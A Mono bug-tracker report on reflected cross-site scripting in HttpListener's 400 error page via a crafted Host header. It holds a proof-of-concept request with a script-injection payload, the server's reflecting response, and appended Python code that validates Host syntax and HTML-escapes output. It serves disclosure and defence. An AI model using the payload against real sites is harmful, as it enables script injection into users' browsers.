Bug 19238 - XSS in error page when host header is exploited
Summary: XSS in error page when host header is exploited
Status: NEW
Alias: None
Product: Class Libraries
Classification: Mono
Component: System
Version: master
Hardware: All All
Importance: --- normal
Target Milestone: Untriaged
Assignee: Bugzilla
Depends on:
Reported: 2014-04-23 05:01 UTC by protel
Modified: 2014-04-23 05:01 UTC

See Also:
Is this bug a regression?: ---
Last known good build:


Description protel 2014-04-23 05:01:25 UTC

During our PCI audit, our security tester found an XSS bug. It is possible to send a manipulated "Host" header that is printed to the resulting error page. This could be used to inject JavaScript into the page.

Here is an example of a manipulated request which has been handled by an HttpListener. I think the problem should be somewhere here: https://github.com/mono/mono/blob/a31c107f59298053e4ff17fd09b2fa617b75c1ba/mcs/class/System/System.Net/HttpListenerRequest.cs#L162 where the hostname validation is not sufficient.

GET /index.html HTTP/1.1
Host: "><script>alert(123)</script>
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:24.0) Gecko/20140319 Firefox/24.0 Iceweasel/24.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0

The response looks like this:

HTTP/1.1 400 Bad Request
Content-Type: text/html; charset=utf-8
Server: Mono-HTTPAPI/1.0
Date: Thu, 17 Apr 2014 15:30:50 GMT
Content-Length: 103
Connection: Close

<h1>Bad Request (Invalid url: http://"><script>alert(123)</script>:80/index.html)</h1>


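The report points at two separate defects: the Host value is accepted with characters that can never appear in a URI host, and the rejected value is then reflected into an HTML body without escaping. The following is an added example (not Mono's code and not the reporter's) showing both checks side by side: a strict Host header parser following the host/port grammar of RFC 3986 section 3.2.2 and RFC 7230 section 5.4, and an error-page builder that HTML-escapes anything it echoes. The function names (parse_host_header, bad_request_page, handle_request) and the simplified IP-literal pattern are assumptions made for the example; the payload is the one from the report.

```python
import html
import re

# Host grammar from RFC 3986 section 3.2.2 / RFC 7230 section 5.4:
#   Host = uri-host [ ":" port ]
#   uri-host = IP-literal / IPv4address / reg-name
# reg-name allows only unreserved / pct-encoded / sub-delims characters, so
# quotes, angle brackets, slashes and spaces are all syntactically invalid.
_REG_NAME = r"(?:[A-Za-z0-9\-._~!$&'()*+,;=]|%[0-9A-Fa-f]{2})+"
_IPV4 = (
    r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
    r"(?:\.(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}"
)
# Assumption for this example: a simplified IP-literal (IPv6 in brackets);
# a full IPv6 / IPvFuture grammar is longer but adds nothing to the point.
_IP_LITERAL = r"\[[0-9A-Fa-f:.]+\]"
_HOST_RE = re.compile(
    rf"^(?P<host>{_IP_LITERAL}|{_IPV4}|{_REG_NAME})(?::(?P<port>\d{{1,5}}))?$"
)


def parse_host_header(value):
    """Return (host, port_or_None) for a syntactically valid Host header,
    or None if the value must be rejected. Surrounding OWS is stripped,
    as an HTTP header parser would."""
    m = _HOST_RE.match(value.strip())
    if not m:
        return None
    port = m.group("port")
    if port is not None:
        port = int(port)
        if port > 65535:
            return None
    return m.group("host"), port


def bad_request_page(raw_host, path):
    """Build the 400 body. The rejected value is still reflected (as the
    Mono page does) but HTML-escaped, so it cannot break out of the text
    node. Not echoing it at all would be the stricter choice."""
    shown = html.escape("http://%s:80%s" % (raw_host, path), quote=True)
    return "<h1>Bad Request (Invalid url: %s)</h1>" % shown


def handle_request(host_header, path):
    """Minimal stand-in for the listener's request handling: returns
    (status, body). A valid Host yields the reconstructed absolute URL;
    an invalid one yields an escaped 400 page."""
    parsed = parse_host_header(host_header)
    if parsed is None:
        return 400, bad_request_page(host_header, path)
    host, port = parsed
    return 200, "http://%s:%d%s" % (host, port if port is not None else 80, path)


# Constructed input: the Host value from the bug report, trailing space included.
PAYLOAD = '"><script>alert(123)</script> '

if __name__ == "__main__":
    for hdr in ("example.com", "example.com:8080", "[::1]:443", "10.0.0.1", PAYLOAD):
        status, body = handle_request(hdr, "/index.html")
        print(status, body)
```

Note that sub-delims still permit `'`, `(` and `)`, so the syntax check alone would not protect an attribute or JavaScript context; the output escaping is what makes reflection safe regardless of where the value lands.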